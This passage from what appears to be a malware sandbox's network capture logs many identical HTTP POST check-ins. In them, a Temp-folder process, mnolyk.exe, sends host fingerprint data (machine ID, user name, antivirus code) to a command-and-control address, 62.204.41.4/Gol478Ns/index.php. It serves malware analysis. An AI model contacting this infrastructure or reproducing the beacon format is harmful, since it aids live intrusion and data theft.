                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:30.225024939 CET | 653 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    454 | 192.168.2.3 | 50157 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:30.407371998 CET | 654 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:30.471529961 CET | 654 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    455 | 192.168.2.3 | 50158 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:30.648699045 CET | 655 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:30.713618994 CET | 655 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    456 | 192.168.2.3 | 50159 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:31.057502031 CET | 656 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:31.123873949 CET | 656 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    457 | 192.168.2.3 | 50160 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:31.348078012 CET | 657 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:31.412136078 CET | 657 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    458 | 192.168.2.3 | 50161 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:31.638391018 CET | 658 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:31.701783895 CET | 658 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    459 | 192.168.2.3 | 50162 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:32.538446903 CET | 659 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:32.603301048 CET | 659 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    46 | 192.168.2.3 | 49748 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:28.171577930 CET | 247 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:28.236423016 CET | 247 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    460 | 192.168.2.3 | 50163 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:32.883796930 CET | 660 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:32.951220036 CET | 660 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    461 | 192.168.2.3 | 50164 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:34.164269924 CET | 661 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:34.236401081 CET | 661 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    462 | 192.168.2.3 | 50165 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:34.424796104 CET | 662 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:34.491898060 CET | 662 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    463 | 192.168.2.3 | 50166 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:34.675266981 CET | 663 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:34.738302946 CET | 663 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    464 | 192.168.2.3 | 50167 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:34.906968117 CET | 664 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:34.971366882 CET | 664 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    465 | 192.168.2.3 | 50168 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:35.170140028 CET | 665 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:35.236284018 CET | 665 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    466 | 192.168.2.3 | 50169 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:35.407766104 CET | 666 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:35.471579075 CET | 666 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    467 | 192.168.2.3 | 50170 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:35.646859884 CET | 667 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:35.710107088 CET | 667 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    468 | 192.168.2.3 | 50171 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:35.892858028 CET | 668 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:35.958611012 CET | 668 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    469 | 192.168.2.3 | 50172 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:36.146003008 CET | 669 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:36.212770939 CET | 669 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    47 | 192.168.2.3 | 49749 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:28.419019938 CET | 248 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:28.485996962 CET | 248 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    470 | 192.168.2.3 | 50173 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:36.396312952 CET | 670 | OUT | POST /Gol478Ns/index.php HTTP/1.1
